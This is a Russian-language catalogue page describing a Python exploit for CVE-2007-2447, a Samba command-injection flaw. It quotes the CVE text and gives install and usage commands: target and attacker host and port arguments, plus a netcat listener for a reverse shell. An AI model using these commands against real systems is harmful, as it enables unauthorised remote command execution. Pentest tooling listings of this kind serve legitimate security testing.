Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2007-2447 — Эксплойт на Python для CVE-2007-2447, нацеленный на уязвимость сценария карты имен пользователей Samba, позволяющий удаленное выполнение команд через метасимволы оболочки с доставкой полезной нагрузки обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/0xkn/cve-2007-2447
Анализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub0xkn/cve-2007-2447

CVE-2007-2447

Эксплойт на Python для CVE-2007-2447, нацеленный на уязвимость сценария карты имен пользователей Samba, позволяющий удаленное выполнение команд через метасимволы оболочки с доставкой полезной нагрузки обратной оболочки.

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2007-2447 — username map script

«Функциональность MS-RPC в smbd в Samba 3.0.0–3.0.25rc3 позволяет удалённым злоумышленникам выполнять произвольные команды через метасимволы оболочки с участием функции (1) SamrChangePassword, когда включена опция smb.conf «username map script», а также позволяет удалённым аутентифицированным пользователям выполнять команды через метасимволы оболочки с участием других функций MS-RPC в (2) удалённом принтере и (3) управлении файловыми ресурсами.»

Эксплойт

Установка:

[*] Для этого эксплойта требуется Python 3.7 или выше

root@kitploit:~
python3 -m pip install pysmb 

Использование:

root@kitploit:~
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost — удалённый хост
  • --lhost — локальный хост
  • --lport — локальный порт
  • --rport — удалённый порт [ * ] Опционально. По умолчанию = 445

Не забудьте запустить свой слушатель:

root@kitploit:~
nc -lvnp 4444

PoC

image

Скачать инструмент